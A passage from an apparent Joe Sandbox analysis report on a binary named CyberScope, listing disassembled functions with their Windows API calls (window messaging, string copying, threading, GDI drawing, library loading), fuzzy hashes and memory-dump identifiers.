                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: 13ed857c23a52f7fdb10f288b17a5e8a9511a992fb8c69feeb54cfb6c7112563
                                                                                    • Instruction ID: 2916a59595bf6547b3a76b83aaba7235193ec1f590821df5e93de54e041105e9
                                                                                    • Opcode Fuzzy Hash: 13ed857c23a52f7fdb10f288b17a5e8a9511a992fb8c69feeb54cfb6c7112563
                                                                                    • Instruction Fuzzy Hash: 0B210231214121BFD710DF64E844F6ABB99AF85314F248248F8268B2D2C779ED42CBD0
                                                                                    APIs
                                                                                      • Part of subcall function 001F96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001F8271,?,000000FF,?,001F90BB,00000000,?,0000001C,?,?), ref: 001F96F3
                                                                                      • Part of subcall function 001F96E4: lstrcpyW.KERNEL32(00000000,?,?,001F8271,?,000000FF,?,001F90BB,00000000,?,0000001C,?,?,00000000), ref: 001F9719
                                                                                      • Part of subcall function 001F96E4: lstrcmpiW.KERNEL32(00000000,?,001F8271,?,000000FF,?,001F90BB,00000000,?,0000001C,?,?), ref: 001F974A
                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001F90BB,00000000,?,0000001C,?,?,00000000), ref: 001F828A
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,001F90BB,00000000,?,0000001C,?,?,00000000), ref: 001F82B0
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,001F90BB,00000000,?,0000001C,?,?,00000000), ref: 001F82EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: b109aa034242f6e919473f03fe173d864949c987ca6ba3840252d65662ca4a44
                                                                                    • Instruction ID: 47cdd67ac0b670f70e3b71d62f99acdb02da12e49746c1b68682c514d0980855
                                                                                    • Opcode Fuzzy Hash: b109aa034242f6e919473f03fe173d864949c987ca6ba3840252d65662ca4a44
                                                                                    • Instruction Fuzzy Hash: 76110B3A200346BBCB15AF78D845E7A77E9FF59750B50402AFA46C72A0EF31D812C754
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 0022615A
                                                                                    • _wcslen.LIBCMT ref: 0022616C
                                                                                    • _wcslen.LIBCMT ref: 00226177
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002262B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 455545452-0
                                                                                    • Opcode ID: ef61906af7055b533293781c6b837bedfdc4847178e6d05d9ee6c95707912b5c
                                                                                    • Instruction ID: adb942aed8dff7642e0270b70e87f23fdb46e13726bcbb5bf0a5309591df5ce9
                                                                                    • Opcode Fuzzy Hash: ef61906af7055b533293781c6b837bedfdc4847178e6d05d9ee6c95707912b5c
                                                                                    • Instruction Fuzzy Hash: F9110632530229B6DB20DFE0AC88AEF777CEF11750B108026F905D6182E7B4D965CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc6dbf2ebdf9ae4d4401546de16f4f4e24ae376d1d51a38128891eda2eb378da
                                                                                    • Instruction ID: c331f900b427e395c6d3529f27b207ce3756d49b1132a4ac40c66f6042aeb858
                                                                                    • Opcode Fuzzy Hash: dc6dbf2ebdf9ae4d4401546de16f4f4e24ae376d1d51a38128891eda2eb378da
                                                                                    • Instruction Fuzzy Hash: AC0178B22092167FE62126B8BCC0F2B661DDF717B8B35432EF522A11D1EB70CCA0D160
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001F2394
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F23A6
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F23BC
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001F23D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 029c4e068fc51eadd3821dfe258694257ba7d060687c0dc1a7fbebd3ba5a1114
                                                                                    • Instruction ID: ca931029418b3c50fb3ec416742f84adaa65664bd2b95dfbcddcf0a4c090cf83
                                                                                    • Opcode Fuzzy Hash: 029c4e068fc51eadd3821dfe258694257ba7d060687c0dc1a7fbebd3ba5a1114
                                                                                    • Instruction Fuzzy Hash: 1211097A900228FFEB119BA5CD85FADFBB8FB08750F200091EA01B7290D7716E15DB94
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001FEB14
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 001FEB47
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001FEB5D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001FEB64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 7448ab42716ec405673e68c6e1a6e61017234994b42429a6896560098ec71e9b
                                                                                    • Instruction ID: 4b4f79ec1bb24674354ef31a2ed66763504a73277676079b02909515c0c068d6
                                                                                    • Opcode Fuzzy Hash: 7448ab42716ec405673e68c6e1a6e61017234994b42429a6896560098ec71e9b
                                                                                    • Instruction Fuzzy Hash: 8111DB76D00618BFD7119BA8AC0DAEE7FADAB45310F148255F915E33A0D7B4891587A0
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,?,001BD369,00000000,00000004,00000000), ref: 001BD588
                                                                                    • GetLastError.KERNEL32 ref: 001BD594
                                                                                    • __dosmaperr.LIBCMT ref: 001BD59B
                                                                                    • ResumeThread.KERNEL32(00000000), ref: 001BD5B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 173952441-0
                                                                                    • Opcode ID: d197fdf91bf8169bac2be9d36060c90f31d0c431197501c4e86efca4efcb8bbf
                                                                                    • Instruction ID: f8365a6b48fd47ac2bc1a28fa48abc8378b45430b2f93998a84273258410f178
                                                                                    • Opcode Fuzzy Hash: d197fdf91bf8169bac2be9d36060c90f31d0c431197501c4e86efca4efcb8bbf
                                                                                    • Instruction Fuzzy Hash: BD01F572404214BBCB386FA5FC09FEA7B79EF81334F200259F925861E0EB709901CBA1
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001978B1
                                                                                    • GetStockObject.GDI32(00000011), ref: 001978C5
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 001978CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: daf6f0e17dbca986c91b82b8b681db95fc71d8cc17ac84b73d9858736d3c5cdf
                                                                                    • Instruction ID: 54e126356f863771f30b76e23879774c6ac88d308bcd9f4f4030390699260e18
                                                                                    • Opcode Fuzzy Hash: daf6f0e17dbca986c91b82b8b681db95fc71d8cc17ac84b73d9858736d3c5cdf
                                                                                    • Instruction Fuzzy Hash: 6C11DE72506548BFEF166F90EC58EEABB6DFF083A4F041116FA05521A0D735EC60EBA0
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002011D9,00000000,00000000,?,001C338D,002011D9,00000000,00000000,00000000,?,001C35FE,00000006,FlsSetValue), ref: 001C3418
                                                                                    • GetLastError.KERNEL32(?,001C338D,002011D9,00000000,00000000,00000000,?,001C35FE,00000006,FlsSetValue,00233260,FlsSetValue,00000000,00000364,?,001C31B9), ref: 001C3424
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001C338D,002011D9,00000000,00000000,00000000,?,001C35FE,00000006,FlsSetValue,00233260,FlsSetValue,00000000), ref: 001C3432
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 8629417ac91abef71bceadd4c72de888f2cb2947e52825576e124744069d1322
                                                                                    • Instruction ID: 087d706b23a92ba329c0beac73e883ff619735ee5229f8669fe9522f0a904cde
                                                                                    • Opcode Fuzzy Hash: 8629417ac91abef71bceadd4c72de888f2cb2947e52825576e124744069d1322
                                                                                    • Instruction Fuzzy Hash: B101AC32611222ABC7364B79AC48F567B58BF65B617218628F916D7581D720DD02C6E0
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001FB69A,?,00008000), ref: 001FBA8B
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001FB69A,?,00008000), ref: 001FBAB0
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001FB69A,?,00008000), ref: 001FBABA
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001FB69A,?,00008000), ref: 001FBAED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: b2d5c759955fd74843b29f13cb0a301cd81867f28debe98e1c631f9faeb86043
                                                                                    • Instruction ID: e3d892d194c3bccfd7c5c95d5ad20207d030c456e83cbb456f467e2c8aa7e6c6
                                                                                    • Opcode Fuzzy Hash: b2d5c759955fd74843b29f13cb0a301cd81867f28debe98e1c631f9faeb86043
                                                                                    • Instruction Fuzzy Hash: 1A117930D04A2DE7DF14EFE9E9886FEBB78BF09711F114085DA41B3580CB3086518BA5
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 0022888E
                                                                                    • ScreenToClient.USER32(?,?), ref: 002288A6
                                                                                    • ScreenToClient.USER32(?,?), ref: 002288CA
                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002288E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: caf9d03aa50d163aa36559e61bd7fdb18d76885724156d16b14fa7eb3a8ac460
                                                                                    • Instruction ID: dfc94f1fa3b1a6186e4d616d4796c104786013b90cf94fcecabc5904f46d2d72
                                                                                    • Opcode Fuzzy Hash: caf9d03aa50d163aa36559e61bd7fdb18d76885724156d16b14fa7eb3a8ac460
                                                                                    • Instruction Fuzzy Hash: AF1143B9D0020AAFDB51CF98D8849EEBBF9FB08310F505156E915E2210D735AA55CF51
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001F3712
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 001F3723
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001F372A
                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001F3731
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: aec4b87155509aa88bde622bc99d8652959da1eb0f0705ea9572ba142234f72d
                                                                                    • Instruction ID: 3c1c79d506caa759c9ae04281f75f3d98a2a1183d90b3bb485997432ed07fb4e
                                                                                    • Opcode Fuzzy Hash: aec4b87155509aa88bde622bc99d8652959da1eb0f0705ea9572ba142234f72d
                                                                                    • Instruction Fuzzy Hash: 95E06DB11012287ADB3027A2AC4EEFB7F6CDB42BA1F500115F609D2080DAA4C941C6B0
                                                                                    APIs
                                                                                      • Part of subcall function 00191F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00191F87
                                                                                      • Part of subcall function 00191F2D: SelectObject.GDI32(?,00000000), ref: 00191F96
                                                                                      • Part of subcall function 00191F2D: BeginPath.GDI32(?), ref: 00191FAD
                                                                                      • Part of subcall function 00191F2D: SelectObject.GDI32(?,00000000), ref: 00191FD6
                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 002292E3
                                                                                    • LineTo.GDI32(?,?,?), ref: 002292F0
                                                                                    • EndPath.GDI32(?), ref: 00229300
                                                                                    • StrokePath.GDI32(?), ref: 0022930E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: dedf0601393ec604b623c027eb16f730c58a800a9fcadb74e852f60eec82e2d5
                                                                                    • Instruction ID: a0b8d83aef84e01b8466609e0ea040ad2cb577d83cbcdb3878755df7e2e2f4ab
                                                                                    • Opcode Fuzzy Hash: dedf0601393ec604b623c027eb16f730c58a800a9fcadb74e852f60eec82e2d5
                                                                                    • Instruction Fuzzy Hash: 5FF05E32016669BADB225F94BC0EFCE3F59AF0A320F148040FA15210F1C7B556669FA5
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 001921BC
                                                                                    • SetTextColor.GDI32(?,?), ref: 001921C6
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 001921D9
                                                                                    • GetStockObject.GDI32(00000005), ref: 001921E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ModeObjectStockText
                                                                                    • String ID:
                                                                                    • API String ID: 4037423528-0
                                                                                    • Opcode ID: 47d9c58ed146e5aa07acde23f159b79d1da69a9b1a5baa31b46b507742d61f84
                                                                                    • Instruction ID: 5c5591bbc07e57a6cb00307dd47c2171d3220244f1e3952aa2506afeee42babc
                                                                                    • Opcode Fuzzy Hash: 47d9c58ed146e5aa07acde23f159b79d1da69a9b1a5baa31b46b507742d61f84
                                                                                    • Instruction Fuzzy Hash: 2BE0E531240640BBDB315BB4BC0DBE97B51AB15335F14921AF7B9581E0C77186519B11
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 001EEC36
                                                                                    • GetDC.USER32(00000000), ref: 001EEC40
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001EEC60
                                                                                    • ReleaseDC.USER32(?), ref: 001EEC81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: f5b7c01bf1669a47febedbf7cd59781ed9e425f1b0f9be1cab77213b92e3c820
                                                                                    • Instruction ID: 23414a684128add976b97da84ded7a065a7e0449cb1d4b4e8a1a541a30558662
                                                                                    • Opcode Fuzzy Hash: f5b7c01bf1669a47febedbf7cd59781ed9e425f1b0f9be1cab77213b92e3c820
                                                                                    • Instruction Fuzzy Hash: E9E01A74800204EFCF609FA0E90CA6DBBF9EB18310F208409F80AE3250C73859029F40
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 001EEC4A
                                                                                    • GetDC.USER32(00000000), ref: 001EEC54
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001EEC60
                                                                                    • ReleaseDC.USER32(?), ref: 001EEC81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: e0809ccceb74de868b9ae410f14670b155c27f3f5f5885541911e9098a917671
                                                                                    • Instruction ID: 73734150ad174c5495271a18f92c29ae2793bba79f6903427195cbcd4fd65031
                                                                                    • Opcode Fuzzy Hash: e0809ccceb74de868b9ae410f14670b155c27f3f5f5885541911e9098a917671
                                                                                    • Instruction Fuzzy Hash: 2AE09A75C04204EFCF619FA0E94CA6DBBF9EB58311F109459F949E3250C77969029F54
                                                                                    APIs
                                                                                      • Part of subcall function 001941EA: _wcslen.LIBCMT ref: 001941EF
                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00205919
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
